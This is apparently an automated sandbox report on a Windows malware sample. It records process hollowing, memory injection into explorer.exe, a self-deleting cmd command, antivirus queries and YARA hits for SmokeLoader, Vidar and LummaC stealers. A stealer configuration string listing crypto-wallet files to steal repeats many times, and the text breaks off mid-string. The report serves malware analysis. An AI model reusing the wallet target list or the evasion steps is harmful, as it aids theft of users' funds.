                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                    Source: C:\Users\user\AppData\Roaming\etrtabdSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\etrtabdSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                    Sample uses process hollowing technique
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeSection unmapped: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base address: 400000Jump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeMemory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeMemory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 401000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeMemory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 422000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeMemory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 42E000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeMemory written: C:\Users\user\AppData\Local\Temp\katDDA4.tmp base: 641000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeProcess created: C:\Users\user\AppData\Local\Temp\katDDA4.tmp C:\Users\user\AppData\Local\Temp\katDDA4.tmpJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katDDA4.tmp" & rd /s /q "C:\ProgramData\FBGIDHCAAKEB" & exitJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1E4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,12_2_6D1E4760
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0C1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,12_2_6D0C1C30
                    Source: explorer.exe, 00000002.00000000.1401510441.00000000044D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1400141858.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1403647144.000000000936E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: explorer.exe, 00000002.00000000.1400141858.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1399823359.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
                    Source: explorer.exe, 00000002.00000000.1400141858.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
                    Source: explorer.exe, 00000002.00000000.1400141858.0000000001090000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                    Source: explorer.exe, 00000002.00000000.1403647144.000000000936E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd]1Q
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D19AE71 cpuid 12_2_6D19AE71
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: GetLocaleInfoA,0_2_0040B534
                    Source: C:\Users\user\AppData\Roaming\etrtabdCode function: GetLocaleInfoA,6_2_0040B534
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D19A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,12_2_6D19A8DC
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0E8390 NSS_GetVersion,12_2_6D0E8390
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: 5876.exe, 00000007.00000003.2058603010.000000000085C000.00000004.00000020.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.2058443269.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected CryptOne packer
                    Source: Yara matchFile source: 0000000B.00000002.2056003216.0000000004279000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Yara detected LummaC Stealer
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 5876.exe PID: 7992, type: MEMORYSTR
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Yara detected SmokeLoader
                    Source: Yara matchFile source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1419307805.0000000002120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1419568302.0000000003C01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Yara detected Vidar
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Yara detected Vidar stealer
                    Source: Yara matchFile source: 11.2.EE6.exe.4470000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.EE6.exe.4247719.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.EE6.exe.44b0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.EE6.exe.4247719.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.EE6.exe.4470000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.EE6.exe.44b0000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: EE6.exe PID: 1640, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: katDDA4.tmp PID: 7360, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: nnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: nnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: 5876.exe, 00000007.00000003.1772581460.000000000085D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                    Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: nnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: nnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: nnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: nnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: nnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: 5876.exe, 00000007.00000003.1772581460.000000000085D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                    Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                    Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: nnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: nnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: nnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia 